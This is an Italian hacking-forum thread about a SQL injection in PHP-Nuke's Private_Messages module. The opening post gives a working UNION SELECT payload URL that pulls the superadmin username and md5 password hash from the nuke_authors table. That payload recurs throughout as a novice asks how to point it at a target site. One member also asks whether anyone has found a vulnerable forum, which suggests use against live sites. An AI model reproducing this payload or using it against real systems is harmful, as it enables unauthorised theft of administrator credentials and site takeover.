PHP Nuke - SQL Injection

[murdercode_imported]

http://victima/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

 

[daniele117]

nn ho capito 'na mazza ma sembra carino il nome

 

[darkdeath]

Praticamente questo "Link" sfrutta una vulnerabilità dei messaggi privati, permettendo di prendere la md5 dell'admin...almeno dallo script mi sembra faccia questo

Corregetemi se sbaglio

 

[Langy]

se c'è nuke sentinel viene bloccato l'accesso al sito.

con quali versioni di phpnuke va? con tutte?

 

[Cryon89]

ottimo lavoro Murder!

 

[hawake]

se c'è nuke sentinel viene bloccato l'accesso al sito.

con quali versioni di phpnuke va? con tutte?

Beh non credo che Murder posti vulnerabilità di software vecchio ! Sarà sicuramente per le versioni 7.9 e/o 8.0 appena posso me lo provo in locale

 

[ciao69]

quindi devo mettere nella barra dell'url questo:


http://ilnome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

?
grazie

 

[DoctorGhost]

quindi devo mettere nella barra dell'url questo:


http://ilnome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

?
grazie

Va prima a presentarti e poi avrai una risposta.

 

[imported_mignolo]

Ma il regolamento lo leggete?
PRESENTATEVI

 

[ciao69]

ok :cry1::cry1:

---

ciao mi sono presentato !
Vorrei sapere se quell'inj deve essere compilata così:
http://nomeforum.forumconphp.it/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


o così:

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


Poi non ho capito se disabilita gli mp dell'adm o da la password md5 dell'adm, perchè muerdercode dice la prima
e TeKing la seconda.

Rispondete grazie


grazie 1000

 

[imported_AlexBio]

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

mi chiedo come questo possa funzionare... hai presente che cosa è un URL???
:slick1:
vabbè cmq è l'altra

 

[ciao69]

ok :cry1::cry1:

---

ciao mi sono presentato !
Vorrei sapere se quell'inj deve essere compilata così:
http://nomeforum.forumconphp.it/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


o così:

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


Poi non ho capito se disabilita gli mp dell'adm o da la password md5 dell'adm, perchè muerdercode dice la prima
e TeKing la seconda.

Rispondete grazie


grazie 1000

---

 

[imported_mignolo]

qualcuno ha trovato un foro vulnerabile??:question1:

 

[ciao69]

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

mi chiedo come questo possa funzionare... hai presente che cosa è un URL???
:slick1:
vabbè cmq è l'altra

1)mi chiedo come possa funzionare significa che secondo te nn funziona?
2)Ma questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm?

 

[Devil_Nemesis]

e siamo a 3... non cercare di capire come si usa se non sai cos'è....

studia!

 

[ciao69]

volevo chiedere visto che ci sono state opinioni diverse se visitando questo url si bloccano gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm?

 

[DoctorGhost]

1)mi chiedo come possa funzionare significa che secondo te nn funziona?
2)Ma questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm?

io mi chiedo come puoi fare qualcosa se non sai neanche come funziona un url.

In questo forum ci sono molte guide incomincia da li.

Se nessun utente ti risponde fa bene perchè tu sei proprio a livelli zero, fatti prima una lettura di tutte le guide sul forum e poi posta le tue domande.

 

[ciao69]

li ho visti i tutorial e anche molti non solo su infernet-x.
Cmq volevo solamente sapere se questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm.
E' solo per sapere se mi può servire o no!
Non è fatto di capire perchè è una sql injection che murdercode dice che questo url blocca gli mp dell'adm mentre un'altro dice che ti da l'md5 della password dell'adm.

Solo lo scopo voglio sapere.

 

[Devil_Nemesis]

"se questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm."

questa frase non ha senso O.O

 

[ciao69]

allora murdecode diceva che questo url blocca gli mp dell'adm, mentre un'altro utente nello stesso topic diceva che invece ti da l'hash md5 della password dell'adm.

 

[DoctorGhost]

li ho visti i tutorial e anche molti non solo su infernet-x.
Cmq volevo solamente sapere se questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm.
E' solo per sapere se mi può servire o no!
Non è fatto di capire perchè è una sql injection che murdercode dice che questo url blocca gli mp dell'adm mentre un'altro dice che ti da l'md5 della password dell'adm.

Solo lo scopo voglio sapere.

Secondo te questo ha senso???

http://nome dell'adm/

e poi cosa significa questo???

99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

Sei sicuro di aver letto qualche tutorial???

E' solo per sapere se mi può servire o no!

Di certo tu non ci fai proprio niente visto che non hai le basi neanche per navigare in internet.

Scusa ma perchè non studi prima, stai solo facendo delle figuraccie.

 

[ciao69]

state esagerando la cosa ....
Prima ho sbagliato con i miei 2 post...
volevo sapere se ti blocca gli mp dell'adm o ti dà l'hash in md5 della password dell'adm pazzo, visto che murdecode dice una cosa e TeKIng un'altra.
http://www.infernet-x.com/php-nuke-sql-injection-t-1145.html

 

[imported_AlexBio]

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

mi chiedo come questo possa funzionare... hai presente che cosa è un URL???
:slick1:
vabbè cmq è l'altra

1)mi chiedo come possa funzionare significa che secondo te nn funziona?

no, vuol dire che non ha senso... per questo ti ho chiesto se sai che cosa è un url... :slick1:

 

[ciao69]

certo ...
o mi sò sbagliato !!!!!!!!!!
leggevo la firma di murd. che diceva che i mp verranno cestinati.
Ok raga scusate tanto quindi ciò che fa questo link è sfruttare una vulnerabilità dei messaggi privati, permettendo di prendere la md5 dell'admin. Come diceva TeKing.

Scusate ancora !!!!!!!!!!!!!!!!!!!
LOOOL che sono stato !!
Sarà l'orario ...

 

[DoctorGhost]

Spero per te che ci prendevi per *bip*